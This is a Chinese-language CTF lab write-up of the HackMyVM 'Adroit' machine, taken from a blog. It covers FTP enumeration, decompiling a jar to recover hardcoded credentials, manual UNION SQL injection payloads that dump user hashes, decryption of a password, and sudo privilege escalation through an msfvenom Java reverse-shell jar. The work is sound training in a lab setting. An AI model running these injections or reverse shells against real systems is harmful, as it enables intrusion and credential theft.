目录
一、测试环境
1、系统环境
渗透机:kali2021.1(192.168.101.127)
靶 机:debian(192.168.101.103)
物理机:win11(192.168.101.241)
2、使用工具/软件
Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、ftp(登录ftp服务器)、java、ssh(远程登陆)、msfvenom(生成jar木马)、update-alternatives(切换Java版本)
Jd-gui(反编译jar包)
二、测试目的
熟悉反编译jar包,获取信息,使用jar形式的反弹shell。
三、操作过程
1、信息搜集
主机探测
arp-scan -l -I eth1靶机IP是:192.168.101.103
端口和服务扫描
nmap -sT -A -p- -T4 192.168.101.103开启了21端口(ftp服务)、22端口(ssh服务)、3306端口(mysql服务)
尝试登录ftp,使用ftp作为用户名成功登录
ftp 192.168.101.103
ftp
查看发现一个目录,目录下有三个文件,全部下载
ls
cd pub
ls -la
get note.txt
get adroitclient.jar
get structure.PNG
查看note.txt信息,介绍了这个jar包的来历
cat note.txt
查看图片,是拓扑图,可以看到,这个jar包可以连接mysql数据库
2、Getshell
接下来进行反编译jar包
用jd-gui查看
可以看到很大信息
secret:Sup3rS3cur3Dr0it
域名:adroit.local
username:zeus
password:god.thunder.olympus
接下来尝试运行jar包,需要使用jdk11以上
Kali切换jdk版本命令:
update-alternatives --config java
因为jar包中访问靶机使用的是域名,需要给kali的hosts文件中添加一条
echo 192.168.101.103 adroit.local >> /etc/hosts
接下来就可以正常运行jar包了
java -jar adroitclient.jarusername和password在反编译中找到了
zeus/god.thunder.olympus
这里jar是和数据库交互的,尝试sql注入
1 union select 1,database() -- -
1 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema ='adroit' -- -
1 union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' -- -
1 union select 1,group_concat(username,0x3a,password) from users -- -得到结果:
数据库:adroit
数据表:ideas,users
字段名:
id,password,username,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,USER值:writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=
获得了账户密码
相应的解密代码可以在jar包中反编译发现
Cryptor类方法
解密过程,将Cryptor类复制到本地,然后在末尾添加main方法
这里加密过的密码有问题,需要将第二个0改为O,即015-->O15
public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
Cryptor cryptor = new Cryptor();
String password = cryptor.decrypt("Sup3rS3cur3Dr0it", "l4A+n+p+xSxDcYCl0mgxKrO15+OEC3aOfdrWafSqwpY=");
System.out.println(password);
}解密完成后,得到密码
just.write.my.ideas
现在可以尝试ssh登录靶机了,信息搜集时得到,靶机开启了22端口的ssh服务
writer/just.write.my.ideas
可以在当前家目录找到user.txt
ls -la
cat user.txtflag:61de3a25161dcb2b88b5119457690c3c
3、提权
查看可利用的文件
sudo -l可以以root身份执行一个jar文件
那么可以使用msf生成jar的反弹shell木马进行利用
msfvenom -p java/shell_reverse_tcp lhost=192.168.101.127 lport=4444 -f jar -o reverse.jar
Msf开启反向监听
msfconsole
use exploit/multi/handler
set payload java/shell_reverse_tcp
set lhost 192.168.101.127
set lport 4444
exploit 
将反弹shell木马上传到靶机并构建sudo文件
wget 192.168.101.127:8888/reverse.jar
cp reverse.jar /tmp/testingmyapp.jar
sudo -u root java -jar /tmp/testingmyapp.jar
可以在攻击机kali上监听到root权限的shell
id
可以在root的家目录查看到root的flag
cd
SHELL=/bin/bash script -q /dev/null
ls -la
cat root.txt得到root.txt
flag:017a030885f25af277dd891d0f151845
四、结论
熟悉了下java语言的规则和反编译方法。练习手工sql注入,利用jar文件进行sudo提权,jar反弹shell木马。
标签:ftp,java,测试报告,Adroit,jar,192.168,HackMyVM,txt,root From: https://blog.csdn.net/2301_79698171/article/details/144892181